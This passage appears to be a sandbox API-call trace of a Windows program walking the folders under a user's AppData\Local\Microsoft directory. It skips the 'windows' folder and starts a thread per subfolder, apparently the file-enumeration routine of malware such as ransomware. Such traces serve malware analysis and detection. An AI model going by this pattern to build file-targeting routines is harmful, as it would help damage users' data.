lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\*.*" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\*.*") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\*.*" [0060.048] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\*.*") returned 61 [0060.048] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\", lpString2="IMJP9_0" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\IMJP9_0") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\IMJP9_0" [0060.048] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\IMJP9_0", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\IMJP9_0\\*.*") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\IMJP9_0\\*.*" [0060.048] GlobalMemoryStatus (in: lpBuffer=0x698fd10 | out: lpBuffer=0x698fd10) [0060.049] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x25440540, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x42c [0060.055] CloseHandle (hObject=0x42c) returned 1 [0060.055] FindNextFileW (in: hFindFile=0x5da4b8, lpFindFileData=0x698fd30 | out: lpFindFileData=0x698fd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x28d257a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x1d705b70, ftLastAccessTime.dwHighDateTime=0x1d35d06, ftLastWriteTime.dwLowDateTime=0x1d705b70, ftLastWriteTime.dwHighDateTime=0x1d35d06, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Internet Explorer", cAlternateFileName="INTERN~1")) returned 1 [0060.055] lstrcmpW (lpString1=".", lpString2="Internet Explorer") returned -1 [0060.055] lstrcmpW (lpString1="..", lpString2="Internet Explorer") returned -1 [0060.055] lstrcmpiW (lpString1="windows", lpString2="Internet Explorer") returned 1 [0060.055] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\*.*" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\*.*") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\*.*" [0060.055] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\*.*") returned 61 [0060.055] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\", lpString2="Internet Explorer" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Internet Explorer") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Internet Explorer" [0060.055] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Internet Explorer", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Internet Explorer\\*.*") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Internet Explorer\\*.*" [0060.055] GlobalMemoryStatus (in: lpBuffer=0x698fd10 | out: lpBuffer=0x698fd10) [0060.055] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x2a9189a0, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x42c [0060.059] CloseHandle (hObject=0x42c) returned 1 [0060.060] FindNextFileW (in: hFindFile=0x5da4b8, lpFindFileData=0x698fd30 | out: lpFindFileData=0x698fd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x28d257a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xf7f22040, ftLastAccessTime.dwHighDateTime=0x1d3373f, ftLastWriteTime.dwLowDateTime=0xf7f22040, ftLastWriteTime.dwHighDateTime=0x1d3373f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Media Player", cAlternateFileName="MEDIAP~1")) returned 1 [0060.060] lstrcmpW (lpString1=".", lpString2="Media Player") returned -1 [0060.060] lstrcmpW (lpString1="..", lpString2="Media Player") returned -1 [0060.060] lstrcmpiW (lpString1="windows", lpString2="Media Player") returned 1 [0060.060] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\*.*" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\*.*") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\*.*" [0060.060] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\*.*") returned 61 [0060.060] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\", lpString2="Media Player" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player" [0060.060] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\*.*") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\*.*" [0060.060] GlobalMemoryStatus (in: lpBuffer=0x698fd10 | out: lpBuffer=0x698fd10) [0060.060] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x2aaa8f90, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x42c [0060.064] CloseHandle (hObject=0x42c) returned 1 [0060.064] FindNextFileW (in: hFindFile=0x5da4b8, lpFindFileData=0x698fd30 | out: lpFindFileData=0x698fd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x4f780d90, ftCreationTime.dwHighDateTime=0x1d2dda2, ftLastAccessTime.dwLowDateTime=0x4bb72310, ftLastAccessTime.dwHighDateTime=0x1d2dda4, ftLastWriteTime.dwLowDateTime=0x4bb72310, ftLastWriteTime.dwHighDateTime=0x1d2dda4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Office", cAlternateFileName="")) returned 1 [0060.064] lstrcmpW (lpString1=".", lpString2="Office") returned -1 [0060.064] lstrcmpW (lpString1="..", lpString2="Office") returned -1 [0060.064] lstrcmpiW (lpString1="windows", lpString2="Office") returned 1 [0060.064] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\*.*" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\*.*") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\*.*" [0060.064] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\*.*") returned 61 [0060.064] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\", lpString2="Office" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Office") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Office" [0060.064] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Office", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Office\\*.*") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Office\\*.*" [0060.064] GlobalMemoryStatus (in: lpBuffer=0x698fd10 | out: lpBuffer=0x698fd10) [0060.064] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x253781f8, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x42c [0060.068] CloseHandle (hObject=0x42c) returned 1 [0060.068] FindNextFileW (in: hFindFile=0x5da4b8, lpFindFileData=0x698fd30 | out: lpFindFileData=0x698fd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x3dc40980, ftCreationTime.dwHighDateTime=0x1d2fad7, ftLastAccessTime.dwLowDateTime=0x609dab00, ftLastAccessTime.dwHighDateTime=0x1d2fad7, ftLastWriteTime.dwLowDateTime=0x609dab00, ftLastWriteTime.dwHighDateTime=0x1d2fad7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Outlook", cAlternateFileName="")) returned 1 [0060.068] lstrcmpW (lpString1=".", lpString2="Outlook") returned -1 [0060.069] lstrcmpW (lpString1="..", lpString2="Outlook") returned -1 [0060.069] lstrcmpiW (lpString1="windows", lpString2="Outlook") returned 1 [0060.069] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\*.*" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\*.*") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\*.*" [0060.069] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\*.*") returned 61 [0060.069] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\", lpString2="Outlook" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Outlook") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Outlook" [0060.069] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Outlook", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Outlook\\*.*") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Outlook\\*.*" [0060.069] GlobalMemoryStatus (in: lpBuffer=0x698fd10 | out: lpBuffer=0x698fd10) [0060.069] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x25227c98, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x42c [0060.076] CloseHandle (hObject=0x42c) returned 1 [0060.076] FindNextFileW (in: hFindFile=0x5da4b8, lpFindFileData=0x698fd30 | out: lpFindFileData=0x698fd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x4bb4c1b0, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0x4bb4c1b0, ftLastAccessTime.dwHighDateTime=0x1d2dda4, ftLastWriteTime.dwLowDateTime=0x4bb4c1b0, ftLastWriteTime.dwHighDateTime=0x1d2dda4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Publisher", cAlternateFileName="PUBLIS~1")) returned 1 [0060.076] lstrcmpW (lpString1=".", lpString2="Publisher") returned -1 [0060.076] lstrcmpW (lpString1="..", lpString2="Publisher") returned -1 [0060.076] lstrcmpiW (lpString1="windows", lpString2="Publisher") returned 1 [0060.076] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\*.*" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\*.*") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\*.*" [0060.076] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\*.*") returned 61 [0060.076] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\", lpString2="Publisher" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Publisher") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Publisher" [0060.076] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Publisher", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Publisher\\*.*") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Publisher\\*.*" [0060.076] GlobalMemoryStatus (in: lpBuffer=0x698fd10 | out: lpBuffer=0x698fd10) [0060.077] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x2a7f0558, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x42c [0060.083] CloseHandle (hObject=0x42c) returned 1 [0060.083] FindNextFileW (in: hFindFile=0x5da4b8, lpFindFileData=0x698fd30 | out: lpFindFileData=0x698fd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x3abef650, ftCreationTime.dwHighDateTime=0x1d2fa9b, ftLastAccessTime.dwLowDateTime=0x3abef650, ftLastAccessTime.dwHighDateTime=0x1d2fa9b, ftLastWriteTime.dwLowDateTime=0x3abef650, ftLastWriteTime.dwHighDateTime=0x1d2fa9b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="TaskSchedulerConfig", cAlternateFileName="TASKSC~1")) returned 1 [0060.083] lstrcmpW (lpString1=".", lpString2="TaskSchedulerConfig") returned -1 [0060.083] lstrcmpW (lpString1="..", lpString2="TaskSchedulerConfig") returned -1 [0060.083] lstrcmpiW (lpString1="windows", lpString2="TaskSchedulerConfig") returned 1 [0060.083] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\*.*" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\*.*") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\*.*" [0060.083] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\*.*") returned 61 [0060.083] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\", lpString2="TaskSchedulerConfig" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\TaskSchedulerConfig") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\TaskSchedulerConfig" [0060.083] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\TaskSchedulerConfig", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\TaskSchedulerConfig\\*.*") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\TaskSchedulerConfig\\*.*" [0060.083] GlobalMemoryStatus (in: lpBuffer=0x698fd10 | out: lpBuffer=0x698fd10) [0060.084] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x2a948a70, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x42c [0060.089] CloseHandle (hObject=0x42c) returned 1 [0060.089] FindNextFileW (in: hFindFile=0x5da4b8, lpFindFileData=0x698fd30 | out: lpFindFileData=0x698fd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x962f4540, ftCreationTime.dwHighDateTime=0x1d305ee, ftLastAccessTime.dwLowDateTime=0x5ef99320, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0x5ef99320, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Visio", cAlternateFileName="")) returned 1 [0060.089] lstrcmpW (lpString1=".", lpString2="Visio") returned -1 [0060.089] lstrcmpW (lpString1="..", lpString2="Visio") returned -1 [0060.089] lstrcmpiW (lpString1="windows", lpString2="Visio") returned 1 [0060.089] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\*.*" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\*.*") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\*.*" [0060.089] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\*.*") returned 61 [0060.089] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\", lpString2="Visio" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Visio") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Visio" [0060.089] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Visio", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Visio\\*.*") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Visio\\*.*" [0060.089] GlobalMemoryStatus (in: lpBuffer=0x698fd10 | out: lpBuffer=0x698fd10) [0060.090] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x2a968ae0, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x42c [0060.095] CloseHandle (hObject=0x42c) returned 1 [0060.095] FindNextFileW (in: hFindFile=0x5da4b8, lpFindFileData=0x698fd30 | out: lpFindFileData=0x698fd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x28d257a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xd8d1fc80, ftLastAccessTime.dwHighDateTime=0x1d3373f, ftLastWriteTime.dwLowDateTime=0xd8d1fc80, ftLastWriteTime.dwHighDateTime=0x1d3373f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Windows", cAlternateFileName="")) returned 1 [0060.095] lstrcmpW (lpString1=".", lpString2="Windows") returned -1 [0060.095] lstrcmpW (lpString1="..", lpString2="Windows") returned -1 [0060.095] lstrcmpiW (lpString1="windows", lpString2="Windows") returned 0 [0060.095] FindNextFileW (in: hFindFile=0x5da4b8, lpFindFileData=0x698fd30 | out: lpFindFileData=0x698fd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x28d257a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2c881c40, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2c881c40, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Windows Mail", cAlternateFileName="WINDOW~3")) returned 1 [0060.095] lstrcmpW (lpString1=".", lpString2="Windows Mail") returned -1 [0060.095] lstrcmpW (lpString1="..", lpString2="Windows Mail") returned -1 [0060.095] lstrcmpiW (lpString1="windows", lpString2="Windows Mail") returned -1 [0060.095] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\*.*" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\*.*") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\*.*" [0060.095] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\*.*") returned 61 [0060.095] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\", lpString2="Windows Mail" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail" [0060.095] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\*.*") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\*.*" [0060.095] GlobalMemoryStatus (in: lpBuffer=0x698fd10 | out: lpBuffer=0x698fd10) [0060.096] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x2a8085c0, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x42c [0060.100] CloseHandle (hObject=0x42c) returned 1 [0060.100] FindNextFileW (in: hFindFile=0x5da4b8, lpFindFileData=0x698fd30 | out: lpFindFileData=0x698fd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x28d257a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d257a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xf7de167e, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Windows Media", cAlternateFileName="WINDOW~2")) returned 1 [0060.100] lstrcmpW (lpString1=".", lpString2="Windows Media") returned -1 [0060.100] lstrcmpW (lpString1="..", lpString2="Windows Media") returned -1 [0060.100] lstrcmpiW (lpString1="windows", lpString2="Windows Media") returned -1 [0060.101] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\*.*" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\*.*") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\*.*" [0060.101] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\*.*") returned 61 [0060.101] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\", lpString2="Windows Media" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Media") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Media" [0060.101] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Media", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Media\\*.*") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Media\\*.*" [0060.101] GlobalMemoryStatus (in: lpBuffer=0x698fd10 | out: lpBuffer=0x698fd10) [0060.101] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x2a998bb0, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x42c [0060.106] CloseHandle (hObject=0x42c) returned 1 [0060.106] FindNextFileW (in: hFindFile=0x5da4b8, lpFindFileData=0x698fd30 | out: lpFindFileData=0x698fd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x28d257a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28de3e80, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x184eadb, ftLastWriteTime.dwHighDateTime=0x1cb8927, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Windows Sidebar", cAlternateFileName="WINDOW~1")) returned 1 [0060.106] lstrcmpW (lpString1=".", lpString2="Windows Sidebar") returned -1 [0060.106] lstrcmpW (lpString1="..", lpString2="Windows Sidebar") returned -1 [0060.106] lstrcmpiW (lpString1="windows", lpString2="Windows Sidebar") returned -1 [0060.106] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\*.*" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\*.*") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\*.*" [0060.106] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\*.*") returned 61 [0060.107] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\", lpString2="Windows Sidebar" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Sidebar") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Sidebar" [0060.107] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Sidebar", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Sidebar\\*.*") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Sidebar\\*.*" [0060.107] GlobalMemoryStatus (in: lpBuffer=0x698fd10 | out: lpBuffer=0x698fd10) [0060.107] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x5cd84c0, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x42c [0060.112] CloseHandle (hObject=0x42c) returned 1 [0060.112] FindNextFileW (in: hFindFile=0x5da4b8, lpFindFileData=0x698fd30 | out: lpFindFileData=0x698fd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x28d257a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28de3e80, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x184eadb, ftLastWriteTime.dwHighDateTime=0x1cb8927, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, 